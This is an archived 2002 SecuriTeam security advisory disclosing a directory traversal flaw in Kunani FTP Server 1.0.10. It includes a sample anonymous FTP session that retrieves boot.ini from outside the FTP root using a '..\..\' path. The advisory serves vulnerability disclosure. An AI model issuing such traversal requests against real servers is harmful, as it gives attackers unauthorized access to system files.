[NT] Kunani FTP Server Vulnerable to a Directory Traversal Attack
From: support@securiteam.com
Date: 12/12/02
- Previous message: support@securiteam.com: "[NEWS] OSM Line Card Header Corruption Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 12 Dec 2002 18:45:29 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
Kunani FTP Server Vulnerable to a Directory Traversal Attack
------------------------------------------------------------------------
SUMMARY
Kunani FTP Server is a free Windows based FTP Server, the product has been
found to contain a security vulnerability that allows remote attackers to
view files and directories outside the bounding FTP directory.
DETAILS
Vulnerable systems:
* Kunani FTP Server version 1.0.10
Example:
######################################################
Verbindung mit server.
220 Kunani FTP Server Ready ( www.kunani.com )
Benutzer (server:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> get ..\..\..\..\..\boot.ini
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
#####################################################
ADDITIONAL INFORMATION
The information has been provided by <mailto:zero-x@linuxmail.org> Zero-X
www.lobnan.de Team.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next message: support@securiteam.com: "[NT] Directory Traversing Vulnerability in 'myServer' Web Server"
- Previous message: support@securiteam.com: "[NEWS] OSM Line Card Header Corruption Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NT] Microsoft Internet Explorer FTP Command Injection Vulnerability
... Get your security news from a reliable source. ... Microsoft Internet Explorer
FTP Command Injection Vulnerability ... possibly steal data and upload malicious files to
an FTP server under the ... (Securiteam) - [NEWS] 3com NBX IP Phone System Denial of Service Attack (CEL)
... Beyond Security would like to welcome Tiscali World Online ... It was possible
to make the remote FTP server crash by issuing this ... a windows client by telneting to
the NBX server on port 21 or by ... call manager located on the outside of their firewall,
... (Securiteam) - Re: Strange response from network
... > to guess what service generally resides at the open port it found. ...
> instance, if I ran my FTP server on port 22, nmap would detect it as an ... Ethical
Hacking at the InfoSec Institute. ... learn to write exploits and attack security infrastructure.
... (Pen-Test) - Re: VFP 9: Help with sending/receiving XML via FTP
... Be prepared to answer the coming questions - I have seen too many setups where security
was slapped on in a hurry. ... FTP server and the risks of someone connecting with
FTP client, ... Technology in itself is so used that "administration" can be handled by
almost anybody - less need for admin knowledge. ... (microsoft.public.fox.programmer.exchange) - Re: firewall & security recommendation
... "Rob Wahmann" wrote: ... > however I wasn't 100% sure if this addressed every
security issue. ... > only a few accounts on the FTP server and it is locked
down pretty tight. ... >> As for the updates, you can get the updates using the automated
update ... (comp.security.firewalls)
